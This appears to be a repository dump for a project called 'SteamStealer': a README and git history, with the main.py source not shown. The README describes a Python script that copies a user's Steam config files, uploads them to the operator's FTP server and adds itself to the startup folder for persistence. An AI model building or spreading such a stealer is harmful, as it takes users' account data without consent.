======================: FILES :======================
======================: README CONTENT :======================
# SteamStealer
hello guys this is just example code, to give people an idea of what you can make with python. It grabs the users steam config files and uploads to your ftp server. Its crappy but here you go.

keep in mind it will add the script to your startup folder so every time you log in to that user the script could run( depending on if you set up .py files to execute or turn the .py file into an exe)
====================== GIT HISTORY: ======================
ddc2815 HEAD@{0}: clone: from https://github.com/h0lyl337/Steam-Stealer
commit ddc2815a3eb66577017c85ad5f2d8e81edb3d6f2
Author: H0lyL337 <deadmanwalkingx13@gmail.com>
Date:   Sat Nov 28 14:34:41 2020 -0800

    Create README.md

commit 4372681f7f9a3df0a07520519d0f5f2ddf07bf5f
Author: H0lyL337 <deadmanwalkingx13@gmail.com>
Date:   Sat Nov 28 14:33:53 2020 -0800

    Create main.py
